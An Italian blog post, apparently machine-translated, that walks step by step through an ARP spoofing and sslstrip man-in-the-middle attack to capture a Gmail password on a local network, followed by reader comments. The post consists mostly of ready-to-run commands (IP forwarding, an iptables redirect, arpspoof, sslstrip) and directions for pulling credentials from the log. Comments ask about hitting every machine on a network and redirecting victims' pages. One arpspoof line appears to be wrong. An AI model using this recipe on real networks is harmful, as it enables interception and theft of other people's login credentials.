Ciao Blogger.
Per oggi ho un piccolo esempio di quanto possa essere pericoloso essere connesso a qualsiasi rete senza la sicurezza di quelle che piacciono a tanti di noi.
Per oggi, userò ArpSpoofing con Sslstrip per ottenere una password Gmail. Per rendere l'ambiente più controllato, ho creato un account chiamato "testarp@gmail.com".
E poiché non mi piacciono molto i preamboli, mettiamoci al lavoro.
AMBIENTE
Per questo test quello che abbiamo è il seguente:
1. Attaccante: È il mio desktop o computer desktop che ha Debian Wheezy. Dai repository puoi installare striscia y annusare arrivare ad avere arpionamento
2. Vittima: La vittima è un tablet Android che vuole vedere la sua posta solo attraverso il browser.
3. Il mezzo: Il mezzo è mio Router Cisco DPC2425
INDIRIZZI.
Indirizzo dell'attaccante: 172.26.0.2
Indirizzo router: 172.26.0.1
Indirizzo della vittima: 172.26.0.8
L'ATTACCO:
La prima cosa che faremo per questo attacco è attivare l'inoltro in modo che il nostro computer possa inoltrare le informazioni alla vittima senza che se ne accorga. (Altrimenti sarebbe un attacco denial of services)
Per questo useremo:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Ora se facciamo tail -f desdelinux vediamo le informazioni dal vivo e dirette
Allora come otteniamo quello che vogliamo?
Inseriamo prima la nostra posta sul Tablet. Durante l'accesso, vediamo che migliaia e migliaia di cose appaiono sulla nostra console.
Ora che è finito apriamo il nostro file “desdelinux” con nano
nano desdelinux
con Control + W cerchiamo qualcosa chiamato SECURE POST.
E vedremo qualcosa di simile.
Tra quella linea enorme che non può essere vista c'è l'email e la password della vittima.
Quindi corriamo a destra finché non vediamo finalmente la luce alla fine del tunnel.
In un'altra occasione vedremo come proteggerci un po 'da questi attacchi.
saluti
Colgo l'occasione per dire che quando il post è stato pubblicato, i comandi non erano corretti.
Al comando iptables alla fine manca l'8080 che si trova su un'altra riga. E poi i comandi arpspoof erano tutti sulla stessa linea. Ogni comando si trova su una riga diversa.
Si spera che l'editor lo veda e possa aggiustarlo.
Saluti.
Ho fatto le correzioni che hai menzionato, va bene?
Se hai intenzione di inserire il codice in una voce preferita, utilizza la visualizzazione HTML e verifica che l'articolo sia corretto prima di inviarlo in sospeso. Grazie.
È agghiacciante sapere che quelli di noi che non hanno la conoscenza sono così vulnerabili. Informazioni molto buone anche quando capisco poco dell'argomento mi rendo conto dell'importanza. Grazie!
saluti
Ma funziona solo se l'aggressore e la vittima sono sulla stessa rete. In ogni caso, mi sembra che se (essendo sulla stessa rete) ti connetti tramite HTTPS ciò non accade perché i dati vengono crittografati PRIMA di lasciare la tua macchina. Se ti connetti tramite HTTP (senza S) penso che anche guardando il cavo di rete si vedano le chiavi.
Non è vero. Sto hackerando una password di Gmail e se noti che Gmail utilizza https. Così? Il punto è che sebbene https sia sicuro, dipende da http. Quindi non è così sicuro.
Non confessare così tanto su un https che la S non è per Superman è per "sicuro"
funziona con o senza https, l'ho provato con una distro linux più specializzata e funziona senza problemi
Puoi usarlo proprio per dare una lezione a coloro che rubano il tuo Wi-Fi. 😀
È più o meno come quello che dicevano tanto tempo fa sul blog di Chema Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, grande cosa fa! / E poi mi dicono paranoico ogni volta che uso la VPN quando vanno a controllare il conto in banca ...). A proposito, devi vedere quanto sono ciniche le persone nei commenti ... se alla fine sta rubando ...
Ora dobbiamo seguire un tutorial su come creare e offrire il tuo servizio VPN.
La storia che colleghi è molto interessante, sembra persino degna di un romanzo, e questo mi ricorda quando usavo Internet dei miei vicini e sebbene dica di conoscere l'argomento, penso che non avrei mai potuto vedere le vere dimensioni del pericolo che avrei potuto durare, fortunatamente per me, hanno solo cambiato la password in WPA2 ed è lì che è iniziata la mia storia con l'ISP haha
Ecco perché il titolo dice Sslstrip in azione.
Funziona finché l'attaccante è nel mezzo
Con quale onda lavori a prisma? -.-
no.
Cosa aspetti a inviare la tua richiesta XD
saluti
buon post
Interessante, farò un test educativo più tardi ... Forse potrei anche rimuovere la password dal WiFi e divertirmi un po '😛
Per caso, puoi fare qualcosa di simile per inviare pagine diverse a quelle richieste dal target? Ad esempio, vogliono aprire Facebook e io li reindirizzo a Google? 😛
Sì. Ma è tutto un tiro molto diverso.
Forse lo posterò più tardi.
post molto buono, questi argomenti sono molto educativi, ora bisogna riuscire a contrastare questo attacco, dato che alcuni (come me) si collegano a reti pubbliche (l'università per esempio) sarebbe utile evitarlo.
Saluti!
Non ha funzionato per me 🙁
Qualcosa mi manca qui, a parte il fatto che le connessioni https sono crittografate tramite un certificato del server (una volta che hai il certificato sulla tua macchina, il tuo browser è responsabile della crittografia) con iptables reindirizzi la porta 80 (http), non 443 , che è https
Lo pensavo anch'io. Il punto è che sebbene https sia "sicuro", purtroppo dipende da http. Quindi sslstrip ne approfitta, fa credere al browser che stia utilizzando le credenziali https ma non lo è.
merda santa! ma il browser dovrebbe visualizzare un avviso del tipo "questo certificato proviene da un sito sospetto o qualcosa del genere" ... dovrò sicuramente fare dei test XD
No, non viene fuori assolutamente nulla.
Finalmente ha funzionato per me
Sono connesso a una rete WEP con password e mi ha comunque mostrato la password direttamente.
Una domanda. Puoi fare la stessa procedura ma per tutti i computer che sono collegati in rete, invece di avere una sola vittima?
Si, puoi. Ma non ho fatto esperimenti. Provalo tu stesso e dicci come va.
L'unica cosa che ottengo con questo è che la macchina della vittima va offline, ma sslstrip non mi mostra nulla: /
Dovresti disabilitare il firewall per un momento. O almeno abilita le connessioni in entrata.
Probe ed io abbiamo potuto vedere solo username e password della pagina facebook, in gmail non ho trovato nessun risultato nel log, inoltre mi serviva solo una riga di arpspoof «arpspoof -i -t«. D'altra parte, la macchina vittima non poteva aprire alcune pagine. Continuerò a indagare, è molto interessante. Un aiuto per chi usa Manjaro, i pacchetti da installare sono: dsniff (qui c'è arpspoff), twisted e python2-pyopenssl. Sslstrip può essere scaricato da qui: http://www.thoughtcrime.org/software/sslstrip/
Per eseguirlo $ python2 sslstrip.py
Saluti.
Non è uscito ma la linea arpspoof è: #arpspoof -i int -t ip-victim ip-router
guarda io faccio esattamente quello che dici:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
il problema è che la vittima che è un altro pc che ho qui nella mia stanza, non ho connessione al punto che devo riavviare il router, cosa posso fare mi aiuti.
Un'altra cosa che sto lavorando con una macchina virtuale, e quando eseguo il comando iwconfig, wlan0 non appare, né quando eseguo ifconfig, tuttavia, se ho internet sulla mia macchina virtuale, cosa con un'interfaccia eth0.